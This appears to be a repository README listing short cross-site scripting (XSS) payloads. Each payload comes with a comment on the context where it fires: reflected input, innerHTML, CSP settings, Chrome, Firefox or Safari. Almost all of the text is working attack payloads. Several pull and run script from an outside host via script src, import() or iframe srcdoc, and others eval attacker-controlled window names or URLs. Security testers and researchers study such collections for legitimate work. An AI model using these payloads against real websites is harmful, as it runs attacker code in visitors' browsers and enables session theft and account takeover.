A collection of short XSS payloads that can be used in different contexts.
The DEMO available here: https://tinyxss.terjanq.me
Current Payloads
<!-- Only works as reflected XSS --> <svg/onload=eval(name)>
<!-- If you control the URL --> <svg/onload=eval(`'`+URL)>
<!-- If you control the name, but unsafe-eval not enabled --> <svg/onload=location=name>
<!-- In chrome, also works inside innerHTML, even on elements not yet inserted into DOM --> <svg><svg/onload=eval(name)>
<!-- If you control window's name, this payload will work inside innerHTML, even on elements not yet inserted into the DOM --> <audio/src/onerror=eval(name)>
<!-- If you control the URL, this payload will work inside innerHTML, even on elements not yet inserted into the DOM --> <img/src/onerror=eval(`'`+URL)>
<!-- Just a casual script --> <script/src=//NJ.₨></script>
<!-- If you control the name of the window --> <iframe/onload=src=top.name>
<!-- If you control the URL --> <iframe/onload=eval(`'`+URL)>
<!-- If number of iframes on the page is constant --> <iframe/onload=src=top[0].name+/\NJ.₨?/>
<!-- for Firefox only --> <iframe/srcdoc="<svg><script/href=//NJ.₨ />">
<!-- If number of iframes on the page is random --> <iframe/onload=src=contentWindow.name+/\NJ.₨?/>
<!-- If unsafe-inline is disabled in CSP and external scripts allowed --> <iframe/srcdoc="<script/src=//NJ.₨></script>">
<!-- If inline styles are allowed --> <style/onload=eval(name)>
<!-- If inline styles are allowed and the URL can be controlled --> <style/onload=eval(`'`+URL)>
<!-- If inline styles are blocked --> <style/onerror=eval(name)>
<!-- Uses external script as import, doesn't work in innerHTML --> <!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header --> <svg/onload=import(/\\NJ.₨/)>
<!-- Uses external script as import, triggers if inline styles are allowed. <!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header --> <style/onload=import(/\\NJ.₨/)>
<!-- Uses external script as import --> <!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header --> <iframe/onload=import(/\\NJ.₨/)>
Deprecated:
<!-- If you control the URL, Safari-only --> <iframe/onload=write(URL)>
<!-- If inline styles are allowed, Safari only --> <style/onload=write(URL)>